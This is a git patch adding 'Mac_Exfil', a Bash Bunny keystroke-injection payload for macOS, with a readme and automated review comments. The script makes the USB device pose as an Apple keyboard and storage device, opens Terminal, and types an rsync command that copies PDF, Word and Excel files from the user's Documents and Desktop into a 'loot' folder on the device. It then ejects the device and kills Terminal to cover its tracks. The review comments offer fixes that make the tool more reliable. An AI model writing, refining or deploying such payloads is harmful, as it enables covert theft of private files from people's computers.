From 2aa4910d0c5a0b0f9ddbf8aaa3e2adbce9ea7f12 Mon Sep 17 00:00:00 2001 From: Carey Balboa <52982329+careyjames@users.noreply.github.com> Date: Tue, 30 Aug 2022 09:28:28 -0500 Subject: [PATCH] add my own exfil payload (#540) * add my own exfil payload Exfiltrates files from logged in users Documents and Desktop folders * updated * Update readme.md --- .../exfiltration/Mac_Exfil/payload.txt | 45 +++++++++++++++++++ .../library/exfiltration/Mac_Exfil/readme.md | 18 ++++++++ 2 files changed, 63 insertions(+) create mode 100755 payloads/library/exfiltration/Mac_Exfil/payload.txt create mode 100644 payloads/library/exfiltration/Mac_Exfil/readme.md diff --git a/payloads/library/exfiltration/Mac_Exfil/payload.txt b/payloads/library/exfiltration/Mac_Exfil/payload.txt new file mode 100755 index 00000000..d7a252cb --- /dev/null +++ b/payloads/library/exfiltration/Mac_Exfil/payload.txt 
@@ -0,0 +1,45 @@ +#!/bin/bash + +# Title: Mac_Exfil +# Description: Exfiltrates files from logged in users Documents and Desktop folders +# Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600 +# Target: macOS +# Dependencies: none +# +# Format your MicroSD XC card for your Bash Bunny Mark II using FAT32 and name it "BUNNY" containing a folder named "loot" +LED SETUP +ATTACKMODE HID STORAGE VID_0x05AC PID_0x0267 +QUACK GUI SPACE +QUACK DELAY 500 +QUACK STRING terminal +QUACK ENTER +QUACK DELAY 1000 +LED STAGE1 +QUACK STRING "rsync -av --max-size=5.0m --include='*.pdf' --include='*.docx' --include='*.xlsx' --exclude='*' ~/Documents/ ~/Desktop/ /Volumes/BUNNY/loot" +QUACK ENTER +QUACK DELAY 2000 +# Sync filesystem +# By default, the Linux kernel writes data to disk asynchronously. +# Writes are buffered (cached) in memory, and written to the storage device at the optimal time. +# The sync command forces an immediate write of all cached data to disk. +# Run sync if you anticipate the system to be unstable, or the storage device to become suddenly unavailable, +# and you want to ensure all data is written to disk. (WE ARE ABOUT TO EJECT IT) +sync +QUACK DELAY 2000 +LED STAGE2 +QUACK STRING "diskutil eject BUNNY && killall Terminal" +QUACK ENTER +QUACK DELAY 1000 +LED STAGE3 +# LED payload complete +LED W FAST +mount /dev/mmcblk0p1 /mnt +files=$(find /mnt/loot -type f | wc -l) +# debug=$(find /mnt/loot -type f) +# DEBUG "switch-1-debug" "$files:$debug" +umount /mnt +if [ "$files" != "0" ]; then +LED FINISH +else +LED FAIL +fi diff --git a/payloads/library/exfiltration/Mac_Exfil/readme.md b/payloads/library/exfiltration/Mac_Exfil/readme.md new file mode 100644 index 00000000..fa9f7f7d --- /dev/null +++ b/payloads/library/exfiltration/Mac_Exfil/readme.md 
@@ -0,0 +1,18 @@ +# Mac_Exfil for the BashBunny + +* Author: Carey Balboa - Mac Help Nashville, Inc. with assistance from corydon76 props to Nashville 2600 +* Version: Version 1.0 +* Target: macOS + +## Description + +A payload that Exfiltrates Word, Excel & PDF files from logged in users Documents and Desktop folders + + +## STATUS + +| LED | Status | +| ------------------ | -------------------------------------------- | +| Purple | Executing Payload | +| Green | Successfully grabbed files | +| Red | Did not get files |
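Review bot: in the payload.txt hunk, the comment block above `sync` (`# By default, the Linux kernel writes data to disk asynchronously.` through `# ... (WE ARE ABOUT TO EJECT IT)`) describes the Linux page cache, but this `sync` executes on the Bash Bunny, while the rsync writes and the later `diskutil eject BUNNY` are typed into the macOS host, so the comment does not describe what the line actually flushes; reword it to say what is synced on the Bunny side at that point, or drop the block. The completion check `if [ "$files" != "0" ]; then` compares the `wc -l` output as a string; `[ "$files" -gt 0 ]` states the intent directly and is robust to any padding in the count. The `# LED payload complete` comment sits before `LED W FAST` although the mount, the file count and the final `LED FINISH`/`LED FAIL` still follow, so it should move to the end or be reworded.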
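Review bot: in the readme.md hunk, the readme omits requirements that the payload header states: the MicroSD card must be FAT32, named `BUNNY` and contain a `loot` folder, and the rsync line only copies files up to `--max-size=5.0m`; add a Setup or Requirements section so a user is not left with `LED FAIL` and no explanation. The LED table lists only Purple, Green and Red, but the payload also emits `LED SETUP`, `LED STAGE1` through `LED STAGE3` and `LED W FAST`; document which colour each stage shows, or note that intermediate stages use the standard Bash Bunny stage colours. Minor: `* Version: Version 1.0` repeats the word, and the Description line should read "logged-in users' Documents and Desktop folders".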